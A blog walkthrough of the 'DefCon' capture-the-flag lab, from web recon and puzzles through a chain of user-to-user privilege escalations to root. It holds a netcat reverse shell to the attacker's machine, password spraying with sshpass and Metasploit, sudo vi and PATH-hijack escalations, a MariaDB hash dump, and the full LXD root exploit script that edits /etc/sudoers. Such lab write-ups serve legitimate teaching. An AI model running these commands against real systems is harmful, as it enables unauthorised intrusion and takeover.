6 July 2022

Pentesting Fun Stuff

following the cyber security path…

DefCon

Introduction

After a first challenge, which can be found on tryhackme.com, this is my second challenge which is dubbed “DefCon”.
The challenge will walk through some of the basic skills and will cover typical CTF-like skills.
I will post parts of the entire solution so people can go forward when stuck after some time, without spoiling everything.

[UPDATE]: Because of the whole Covid-19 thing and the world going into lock-down, I completely forgot I haven’t finished this write-up and got stuck at user Smith. This update is the last one as it will be the last piece to escalate to root.

Recon

First finding open ports and running services:

PORT    STATE  SERVICE  VERSION
22/tcp  open   ssh?
80/tcp  open   http     Apache httpd 2.4.25
222/tcp closed rsh-spx
443/tcp open   ssl/http Apache httpd 2.4.25 ((Debian))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.70%I=7%D=6/10%Time=5CFE6D96%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,8,"8\[Vuu2\r\n");
MAC Address: 00:0C:29:08:EA:C8 (VMware)
Service Info: Host: nsa-server

Web-server

When directing the browser to IP 192.168.2.23 there is an error: Server not found and the URL has changed

The browser doesn’t know where to go, because there is no DNS. To solve this add an entry to the /etc/hosts file.

192.168.2.23	nsa-server.net

Now the browser knows where to go.
Because the SSL certificate is self-signed there is a warning.

When accepting the risks the website is shown.

On this page there are 3 crypto puzzles.

Puzzle 1

dr0 cy berws sthre atapd phi shin g00ghac kergnka liikama lware erfhtim stnegar ans omwarefo drows sapeh tv iruss isiht

Puzzle 2

TTSFM34YHHWGGSRSIEOR0SEMSPRA0YV4IADHDO3RSSOANUR7

Puzzle 3

turret much eagle jazzers slow fish sleep sense red perv ending spider ice atlas flood zebra kilo phone

SSL

When checking the SSL certificate there is some information about an mail address which has another domain name.

This indicates that there is probably several virtual hosts active on the remote web-server.
To browse the other domain name, we adjust the /etc/hosts file again.

By altering the line: 192.168.2.23 nsa-server.net nsa-secretserver.net, the browser can be directed to the other domain.

There is a terminal on the main page that informs about the status of the system.
When waiting long enough it looks like there is something wrong with the system and at the end, there is some code being exfiltrated.

-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--

The sequence is Morse code. The forward slash is functioning as letter delimiter and the backslash as word delimiter.
The website https://gchq.github.io/CyberChef/ can help with the deciphering.

TE WORDPRE PAWORD OF JON I T1LLAY!!!

There is a problem with the result. It is missing parts.
When taking another look at the source code of the page with the Morse, there is a problem with the Morse code.
It looks like there is a character encoded. To solve this problem a side step is needed.

root@redteam:~/DefCon/morse# echo "-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--" > string.txt
root@redteam:~/DefCon/morse# sed -i 's/\&\#8230\;/.../g' string.txt 
root@redteam:~/DefCon/morse# cat string.txt 
-/..../.\.--/---/.-./-../.--./.-././.../...\.--./.-/.../.../.--/---/.-./-..\---/..-.\.---/---/..../-.\../...\.../-/.----/.-../.-../...--/.-/.../-.--/-.-.--/-.-.--/-.-.--

After another try with the corrected string the result on cyberchef is better.

THE WORDPRESS PASSWORD OF JOHN IS [SPOILER]

WordPress – Graham

The WordPress dashboard holds a menu called plugins. Here there is a plugin called WPTerm, which offers a terminal for the system.

EoP1 – Graham > John

In the /home/graham folder there is some mail.

graham:/home/graham $ cat mbox
From john@nsa-server Mon Jun 10 11:35:48 2019
Return-path: <john@nsa-server>
Envelope-to: graham@nsa-server
Delivery-date: Mon, 10 Jun 2019 11:35:48 +0200
Received: from john by nsa-server with local (Exim 4.89)
	(envelope-from <john@nsa-server>)
	id 1haGiS-0004Sh-6R
	for graham@nsa-server; Mon, 10 Jun 2019 11:35:48 +0200
To: <graham@nsa-server>
Subject: password problems
X-Mailer: mail (GNU Mailutils 3.1.1)
Message-Id: <E1haGiS-0004Sh-6R@nsa-server>
From: john@nsa-server
Date: Mon, 10 Jun 2019 11:35:48 +0200

Hi Graham,

Sorry man to bother you, but I forgot my password.
I don't want to go to Smith because he will rip me a new hole.
Can you please help me?

Thanks man!!!

John

In the Trash folder there is a deleted note.

graham:/home/graham/.local/share/Trash/files $ cat note.txt
Hi John,

After your latest password failure I changed it. You know where it is right? Wink Wink!
Pretty easy right? Try not to forget this one also.
You know how the boss is like! You wanna get fired or something?

Also smart idea to sent this message with netcat right?
I don't trust our mailsystem.
After sending this message, I'll trow it away....no one will know.

hahahaha......now who is a cybernoob!!!!

Best,

Graham


P.S. You Do kNow whEre The paSswoRd Is hiDden rigHt?

The new password of John is hidden inside this message in plain sight.
The last line has some uppercase letters, when separating them from the string they form the password.

root@redteam:~/DefCon/john# echo "You Do kNow whEre The paSswoRd Is hiDden rigHt?" > pass.enc
root@redteam:~/DefCon/john# cat pass.enc | sed 's/[a-z]//g' | sed 's/ //g' | sed 's/\?//g' > pass.dec
root@redteam:~/DefCon/john# cat pass.dec 
[SPOILER]

With the username + password su-ing as john would be the next step.

graham:/home/graham/.local/share/Trash/files $ su john
su: must be run from a terminal

That is not going to work. Normally now would be a good time to SSH to this system as John.
But the SSH running on port 22 is a honeypot. So that would be a waste of time.
Instead a reverse shell to get a proper TTY shell is better.

First start a listener on your machine with netcat

root@kali:~# nc -lvnp 1337
listening on [any] 1337 ...

Then connect from the remote machine to your machine with netcat.

graham:/home/graham/.local/share/Trash/files $ nc 10.10.10.128 1337 -e /bin/sh

Now the connection is established and there is a reverse shell running.

connect to [10.10.10.128] from (UNKNOWN) [10.10.10.129] 43696
id
uid=1002(graham) gid=1002(graham) groups=1002(graham),8(mail)

Now to get a proper TTY.

python -c 'import pty;pty.spawn("/bin/bash");'
graham@nsa-server:/home/graham/.local/share/Trash/files$

After this switch to user John.

graham@nsa-server:/home/graham/.local/share/Trash/files$ su john
Password: 
john@nsa-server:/home/graham/.local/share/Trash/files$ id
uid=1003(john) gid=1003(john) groups=1003(john),8(mail)

EoP 2 – John > George

First see what this user can do.

john@nsa-server:~$ sudo -l
sudo -l
[sudo] password for john: YDNETSRIDH

Matching Defaults entries for john on nsa-server:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User john may run the following commands on nsa-server:
    (ALL) PASSWD: /bin/systemctl start ssh, /bin/systemctl stop ssh,
        /bin/systemctl status ssh

It looks like user john can start a proper ssh server.

john@nsa-server:~$ sudo /bin/systemctl start ssh

But port 22 was already used for the honeypot, so let´s check which port is used for the SSH server.

john@nsa-server:~$ ss -tan         
ss -tan
State      Recv-Q Send-Q Local Address:Port               Peer Address:Port              
LISTEN     0      80     127.0.0.1:3306                     *:*                  
LISTEN     0      128          *:80                       *:*                  
LISTEN     0      5      10.14.185.1:53                       *:*                  
LISTEN     0      128          *:22                       *:*                  
LISTEN     0      20     127.0.0.1:25                       *:*                  
LISTEN     0      128          *:443                      *:*                  
LISTEN     0      128          *:222                      *:*                  
ESTAB      0      0      192.168.20.130:443                192.168.20.131:44098              
ESTAB      0      91     192.168.20.130:50678              192.168.20.131:9999               
LISTEN     0      5      fe80::cc1a:73ff:fe37:ea85%lxdbr0:53                      :::*                  
LISTEN     0      2          ::1:3350                    :::*                  
LISTEN     0      20         ::1:25                      :::*                  
LISTEN     0      2           :::3389                    :::*                  
LISTEN     0      128         :::222                     :::*

Looks like port 222 is listening for a connection.

n0w4n@lab:~/DefCon$ ssh john@nsa-server.net -p 222
The authenticity of host '[nsa-server.net]:222 ([192.168.20.130]:222)' can't be established.
ECDSA key fingerprint is SHA256:sRxKXwYbv1ua3s7dbnPyX0hmggOGZ6IX3eDflEQ66Bo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[nsa-server.net]:222,[192.168.20.130]:222' (ECDSA) to the list of known hosts.
john@nsa-server.net's password: 
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Fri Apr 10 14:03:51 2020 from 10.10.10.130
john@nsa-server:~$

There is a file on the Documents folder.

john@nsa-server:~/Documents$ ls -lah
ls -lah
total 20K
drwxr-x---  2 john john 4.0K Apr 10 14:42 .
drwxr-x--- 16 john john 4.0K Apr 22 10:23 ..
-rw-r--r--  1 john john  11K Apr 10 14:42 secret.png
john@nsa-server:~/Documents$ file secret.png
file secret.png
secret.png: PDF document, version \012.\012

When looking at the extension, it looks like it´s picture.
But when checking the type of file, Linux says it´s a PDF.
To get a better view of the file, we transfer it to the local machine.

n0w4n@lab:~/DefCon$ scp -P 222 john@nsa-server.net:/home/john/Documents/secret.png .
john@nsa-server.net's password: 
secret.png

When we try to open the file like a picture, there is nothing to show.
Let´s copy the file and rename it to a PDF file.

Also nothing.
When looking at the file in hexeditor, the important part to check is the header.

There are several lists with the hex file headers.
When looking at the hex header for PDF we see this is similar to our file.

But the file wasn´t named .pdf
It was .png

As we can see the first 5 bytes are that of a PDF header.
But when looking a bit further, we see the 6th, 7th and 8th byte looks similar like the PNG header.
Let´s overwrite the header to match the PNG file header.

As we look to the ASCII section of hexeditor, we see this hex header is the one of PNG.

n0w4n@lab:~/DefCon$ file secret.png
secret.png: PNG image data, 886 x 669, 8-bit/color RGB, non-interlaced

The file is now readable as a picture and when opening it, there is a string.
A password maybe? But for who?

n0w4n@lab:~/DefCon$ cat names.list 
george
graham
nicky
samantha
smith

To get the correct name with the found password, there are several ways to go about.
In this writeup, we´re going to try one of the following three:

First one – because it´s a small list of names, we can do it by hand or try a small bash one-liner.

n0w4n@lab:~/DefCon$ for i in $(cat names.list); do ssh -l "${i}" nsa-server.net -p 222; done
george@nsa-server.net's password: 
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 10 14:45:30 2020 from 10.10.10.130
george@nsa-server:~$

Pretty simple, but with a very long list of names it becomes an annoying task to perform.
The second options is to use a tool called sshpass.

n0w4n@lab:~/DefCon$ for i in $(cat names.list); do sshpass -p "2W3dsF5tGh-Kl#1" ssh -o StrictHostKeyChecking=no "${i}"@nsa-server.net -p 222; done
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 22 13:40:32 2020 from 192.168.20.131
george@nsa-server:~$

This option was quit faster and didn’t need any form of manual input for the password.
The final option is to use Metasploit:

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf5 auxiliary(scanner/ssh/ssh_login) > set PASSWORD 2W3dsF5tGh-Kl#1
PASSWORD => 2W3dsF5tGh-Kl#1
msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE names.list
USER_FILE => names.list
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS nsa-server.net
RHOSTS => nsa-server.net
msf5 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(scanner/ssh/ssh_login) > set RPORT 222
RPORT => 222
msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 192.168.20.130:222 - Success: 'george:2W3dsF5tGh-Kl#1' ''
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.20.131:38663 -> 192.168.20.130:222) at 2020-04-22 13:53:41 +0200
[-] 192.168.20.130:222 - Failed: 'graham:2W3dsF5tGh-Kl#1'
[-] 192.168.20.130:222 - Failed: 'nicky:2W3dsF5tGh-Kl#1'
[-] 192.168.20.130:222 - Failed: 'samantha:2W3dsF5tGh-Kl#1'
[-] 192.168.20.130:222 - Failed: 'smith:2W3dsF5tGh-Kl#1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This option also works fast when you have a very long list of usernames.
It also works very fast if you also have a list with passwords and you need to compare it.

EoP 3 – George > Samantha

The recon section starts over when logging in as a different user.
In this case user george has also some rights on this system.

george@nsa-server:~$ sudo -l
[sudo] password for george: 
Matching Defaults entries for george on nsa-server:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User george may run the following commands on nsa-server:
    (samantha) /usr/bin/vi

This user can run Vi editor with the rights of user Samantha.
We can abuse this, but you need to run Vi as user Samantha.

george@nsa-server:~$ sudo -u samantha vi test

Inside Vi editor there is an option to run a command:

$ id
uid=1006(samantha) gid=1006(samantha) groups=1006(samantha)

Use Python again to get a proper TTY.

$ python -c 'import pty;pty.spawn("/bin/bash");'
samantha@nsa-server:/home/george$

EoP 4 – Samantha > Nicky

Back in the home folder of this user, there is something of interest.

samantha@nsa-server:~$ ls -lah
total 72K
drwxr-x--- 10 samantha samantha 4.0K Apr 10 19:49 .
drwxr-xr-x  8 root     root     4.0K Apr 10 14:40 ..
-rw-------  1 samantha samantha    1 Apr 11 17:55 .bash_history
-rw-r--r--  1 samantha samantha  220 May 15  2017 .bash_logout
-rw-r--r--  1 samantha samantha 3.5K May 15  2017 .bashrc
-rwsr-xr-x  1 root     root     8.6K Apr 10 16:17 check
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Desktop
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Documents
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Downloads
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Music
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Pictures
-rw-r--r--  1 samantha samantha  675 May 15  2017 .profile
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Public
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Templates
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Videos
-rw-------  1 samantha samantha 2.1K Apr 10 19:49 .viminfo

There is an executable with the SUID flag enabled.
Let’s see what the program does.

samantha@nsa-server:~$ ./check
[-] These are all the connections at the moment:

Netid  State      Recv-Q Send-Q Local Address:Port               Peer Address:Port              
udp    UNCONN     0      0         *:1900                  *:*                  
udp    UNCONN     0      0      10.14.185.1:53                    *:*                  
udp    UNCONN     0      0         *:58430                 *:*                  
udp    UNCONN     0      0      *%lxdbr0:67                    *:*                  
udp    UNCONN     0      0         *:5353                  *:*                  
udp    UNCONN     0      0      fe80::cc1a:73ff:fe37:ea85%lxdbr0:53                   :::*                  
udp    UNCONN     0      0        :::58540                :::*                  
udp    UNCONN     0      0        :::5353                 :::*                  
tcp    LISTEN     0      80     127.0.0.1:3306                  *:*                  
tcp    LISTEN     0      128       *:80                    *:*                  
tcp    LISTEN     0      5      10.14.185.1:53                    *:*                  
tcp    LISTEN     0      128       *:22                    *:*                  
tcp    LISTEN     0      20     127.0.0.1:25                    *:*                  
tcp    LISTEN     0      128       *:443                   *:*                  
tcp    LISTEN     0      128       *:222                   *:*                  
tcp    ESTAB      0      0      192.168.20.130:222                192.168.20.131:48834              
tcp    LISTEN     0      5      fe80::cc1a:73ff:fe37:ea85%lxdbr0:53                   :::*                  
tcp    LISTEN     0      2       ::1:3350                 :::*                  
tcp    LISTEN     0      20      ::1:25                   :::*                  
tcp    LISTEN     0      2        :::3389                 :::*                  
tcp    LISTEN     0      128      :::222                  :::*

It runs the ss command and shows a list of the current connections.
If the program is using a relative path to execute the command we can manipulate PATH and fool the program in running something in our favor.

To do this, we first create our own version of ss.

samantha@nsa-server:~$ echo "/bin/bash" > /tmp/ss

Then we make the file executable.

samantha@nsa-server:~$ chmod +x /tmp/ss

Because we want the program to execute our ss file instead of the correct one, we alter the PATH variable.

samantha@nsa-server:~$ export PATH=/tmp:$PATH

This way whenever the system is going to look for a program it will cycle through the PATH variable.
Normally it will start in /usr/local/bin and then go to /usr/bin and keeps on going until it finds the program.
Or not and then you get an error that the program can´t be found.
When executing the check program, the system will cycle through the PATH variable, but it will start in /tmp first.
It will find our ss executable and thinks it found the correct one and will run it.

samantha@nsa-server:~$ ./check
[-] These are all the connections at the moment:

nicky@nsa-server:~$ id
uid=1007(nicky) gid=1007(nicky) groups=1007(nicky),1006(samantha)

Running the program resulted in executing our ss version and elevated our rights to….nicky (not root – bummer).

EoP 5 – Nicky > Smith

When looking at the connections earlier there was another connection that has some interest.
There is running a MariaDB instance locally.
As it seems, user nicky has access.
To log in to MariaDB, you need a password.
Lucky for you, user Nicky stores hers in a hidden file.

nicky@nsa-server:~/Documents$ ls -lah
total 12K
drwxr-xr-x  2 nicky nicky 4.0K Apr 22 14:54 .
drwxr-x--- 10 nicky nicky 4.0K Apr 10 17:01 ..
-rw-r--r--  1 nicky nicky   14 Apr 22 14:54 .passwd
nicky@nsa-server:~/Documents$ cat .passwd 
We_iuh#-qaSW1

When looking at all the network connections, it looks like there is running a mysql server with a local only connection.

nicky@nsa-server:/home/nicky/Documents$ mysql -u nicky -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 22
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

List all databases.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.02 sec)

Select the database to use.

MariaDB [wordpress]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

Show all tables.

MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
30 rows in set (0.00 sec)

Select the desired columns to show.

MariaDB [mysql]> select user,password from user;
+---------+-------------------------------------------+
| user    | password                                  |
+---------+-------------------------------------------+
| root    |                                           |
| admin   | *6B6D111D0EC8D42C2955E082DD087C3E56B17F98 |
| wpadmin | *5EF818CD1907F11532AD4EB544573261C73F7F2E |
| smith   | *BE84A0E22A8E3E1EAA0883956B3F8692DFE4CA13 |
| nicky   | *75961C95665DC2BAC3F947AF4C60FD73564BCFE2 |
+---------+-------------------------------------------+
5 rows in set (0.00 sec)

MariaDB [mysql]>

Crack it with either hashcat or just run a Google search for a site with a list of known hashes.
There is one hash that is a known one and that is the password hash of user smith.

Now to exit mysql and switching to user smith.

MariaDB [mysql]> exit;
Bye
nicky@nsa-server:/home/nicky/Documents$ su smith
Password: 
smith@nsa-server:/home/nicky/Documents$ id
uid=1001(smith) gid=1001(smith) groups=1001(smith),8(mail),999(lxd)

EoP 6 – Smith > Root

This user is part of the lxd group.
Lucky for us Linux systems running LXD are vulnerable to privilege escalation.

smith@nsa-server:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:01:e2:4b brd ff:ff:ff:ff:ff:ff
    inet 192.168.20.130/24 brd 192.168.20.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe01:e24b/64 scope link 
       valid_lft forever preferred_lft forever
3: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default qlen 1000
    link/ether ce:1a:73:37:ea:85 brd ff:ff:ff:ff:ff:ff
    inet 10.14.185.1/24 scope global lxdbr0
       valid_lft forever preferred_lft forever
    inet6 fe80::cc1a:73ff:fe37:ea85/64 scope link 
       valid_lft forever preferred_lft forever

As we can see, there is an interface with the name: lxdbr0
This is an LXD bridge, which connects a socket the a container.

Let’s see if there is a container loaded already.

smith@nsa-server:~$ lxc ls
bash: lxc: command not found

That´s odd. LXC is the client program to run commands to interact with LXD containers.

smith@nsa-server:~$ which lxc

Nothing

smith@nsa-server:~$ find / -iname "lxc" 2>/dev/null
/etc/bash_completion.d/lxc
/usr/share/bash-completion/completions/lxc
/var/snap/lxd/common/lxc
/snap/bin/lxc
/snap/lxd/10756/bin/lxc
/snap/lxd/10756/commands/lxc
/snap/lxd/10756/lxc
/home/smith/snap/lxd/10756/.config/lxc

There is a folder /snap/bin with executables

smith@nsa-server:~$ ls -lah /snap/bin
total 8.0K
drwxr-xr-x 2 root root 4.0K Jun  9  2019 .
drwxr-xr-x 5 root root 4.0K Jun  9  2019 ..
lrwxrwxrwx 1 root root    7 Jun  9  2019 lxc -> lxd.lxc
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.benchmark -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.buginfo -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.check-kernel -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.lxc -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.migrate -> /usr/bin/snap

And there is the needed LXC

smith@nsa-server:~$ /snap/bin/lxc ls
+---------+---------+------+------+------------+-----------+
|  NAME   |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+---------+---------+------+------+------------+-----------+
| nsa-lab | STOPPED |      |      | PERSISTENT |           |
+---------+---------+------+------+------------+-----------+

It looks like there is a container, but it´s not active
There is a known exploit for this particular scenario, which is a bash script exploiting the situation
This script is written by initstring

#!/bin/bash

# Local root exploit by initstring (github.com/initstring/lxd_root)
# This takes advantage of any member of ability for any member of the local
# `lxd` group to mount the host root filesystem into a container, hijacking
# the privileges of root.
#
# We can then use the high-privilege mount to modify the /etc/sudoers file.

USAGE="$(basename "$0") <container name>
The exploit currently requires an existing container."

if [ $# -eq 0 ]
then
    echo "$USAGE"
    exit 0
fi

echo "[+] Stopping container $1"
lxc stop "$1"

echo "[+] Setting container security privilege on"
lxc config set "$1" security.privileged true

echo "[+] Starting container $1"
lxc start "$1"

echo "[+] Mounting host root filesystem to $1"
lxc config device add "$1" rootdisk disk source=/ path=/mnt/root recursive=true

echo "[+] Using container to add $USER to /etc/sudoers"
lxc exec "$1" -- /bin/sh -c "echo $USER 'ALL=(ALL)' NOPASSWD: ALL >> /mnt/root/etc/sudoers"

echo "[+] Unmounting host root filesystem from $1"
lxc config device remove "$1" rootdisk

echo "[+] Resetting container security privilege to off"
lxc config set "$1" security.privileged false

echo "[+] Stopping the container"
lxc stop "$1"

echo "[+] Done! Enjoy your sudo superpowers!"

exit 0

Easiest way is to create a file with this script locally and scp it to the remote system

n0w4n@lab:~/DefCon$ scp -P 222 lxd-exploit.sh smith@nsa-server.net:/home/smith

Let´s see if the file is available

smith@nsa-server:~$ ls -lah
total 124K
drwxr-x--- 18 smith smith 4.0K Apr 22 15:38 .
drwxr-xr-x  8 root  root  4.0K Apr 10 14:40 ..
-rw-r-x---  1 smith smith  417 Apr 22 15:38 .bash_history
-rw-r-x---  1 smith smith  220 May 15  2017 .bash_logout
-rw-r-x---  1 smith smith 3.6K Apr 10 20:58 .bashrc
drwxr-x--- 14 smith smith 4.0K Apr 14 13:19 .cache
drwxr-x--- 14 smith smith 4.0K Apr 14 13:19 .config
drwxr-x---  2 smith smith 4.0K May 10  2019 Desktop
drwxr-x---  2 smith smith 4.0K May 10  2019 Documents
drwxr-x---  2 smith smith 4.0K Apr 10 14:23 Downloads
-rw-r--r--  1 smith smith 1.3K Apr 22 15:34 exploit.sh
drwxr-x---  3 smith smith 4.0K May 10  2019 .gnupg
-rw-r-x---  1 smith smith 5.0K Apr 22 15:38 .ICEauthority
drwxr-x---  3 smith smith 4.0K May 10  2019 .local
-rw-r--r--  1 smith smith 1.3K Apr 22 15:35 lxd-exploit.sh
drwxr-x---  5 smith smith 4.0K May 10  2019 .mozilla
drwxr-x---  2 smith smith 4.0K May 10  2019 Music
-rw-------  1 smith smith  181 Apr 10 21:04 .mysql_history
drwxr-x---  2 smith smith 4.0K May 10  2019 Pictures
drwx------  3 smith smith 4.0K Apr 14 13:19 .pki
-rw-r-x---  1 smith smith  675 May 15  2017 .profile
drwxr-x---  2 smith smith 4.0K May 10  2019 Public
drwxr-xr-x  3 smith smith 4.0K Jun 10  2019 snap
drwxr-x---  2 smith smith 4.0K May 10  2019 .ssh
drwxr-x---  2 smith smith 4.0K May 10  2019 Templates
drwxr-x---  2 smith smith 4.0K May 10  2019 Videos
-rw-------  1 smith smith 8.4K Apr 22 15:34 .viminfo
-rw-r-x---  1 smith smith  256 Jun 10  2019 .wget-hsts

There it is
Now to make the script executable and run it

smith@nsa-server:~$ chmod +x lxd-exploit.sh 
smith@nsa-server:~$ ./lxd-exploit.sh nsa-lab
[+] Stopping container nsa-lab
./lxd-exploit.sh: line 20: lxc: command not found
[+] Setting container security privilege on
./lxd-exploit.sh: line 23: lxc: command not found
[+] Starting container nsa-lab
./lxd-exploit.sh: line 26: lxc: command not found
[+] Mounting host root filesystem to nsa-lab
./lxd-exploit.sh: line 29: lxc: command not found
[+] Using container to add smith to /etc/sudoers
./lxd-exploit.sh: line 32: lxc: command not found
[+] Unmounting host root filesystem from nsa-lab
./lxd-exploit.sh: line 35: lxc: command not found
[+] Resetting container security privilege to off
./lxd-exploit.sh: line 38: lxc: command not found
[+] Stopping the container
./lxd-exploit.sh: line 41: lxc: command not found
[+] Done! Enjoy your sudo superpowers!

Why is it not working? Remember the missing lxc command earlier?
Either you add the required folder to PATH or adjust the script
Because it is faster to just adjust PATH, we go for that option

smith@nsa-server:~$ export PATH=/snap/bin:$PATH

Now to run the script again

smith@nsa-server:~$ ./lxd-exploit.sh nsa-lab
[+] Stopping container nsa-lab
Error: The container is already stopped
Try `lxc info --show-log nsa-lab` for more info
[+] Setting container security privilege on
[+] Starting container nsa-lab
[+] Mounting host root filesystem to nsa-lab
Device rootdisk added to nsa-lab
[+] Using container to add smith to /etc/sudoers
[+] Unmounting host root filesystem from nsa-lab
Device rootdisk removed from nsa-lab
[+] Resetting container security privilege to off
[+] Stopping the container
[+] Done! Enjoy your sudo superpowers!

Let´s check those superpowers

smith@nsa-server:~$ sudo -l
Matching Defaults entries for smith on nsa-server:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User smith may run the following commands on nsa-server:
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL

That will do

smith@nsa-server:~$ sudo su -
root@nsa-server:~#

Now for the flag

root@nsa-server:~# cd /root
root@nsa-server:~# ls -lah
total 164K
drwx------ 24 root root 4.0K Apr 10 21:45 .
drwxr-xr-x 24 root root 4.0K Jun  9  2019 ..
-rw-------  1 root root  163 Apr 14 13:22 .bash_history
-rw-r--r--  1 root root  570 May 14  2019 .bashrc
drwx------  9 root root 4.0K Jun 10  2019 .cache
-rwxr-xr-x  1 root root  171 Apr 10 17:05 clean.sh
drwx------ 11 root root 4.0K Jun 10  2019 .config
drwx------  3 root root 4.0K May 14  2019 .dbus
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Desktop
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Documents
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Downloads
drwxr-xr-x  4 root root 4.0K May 13  2019 endlessh
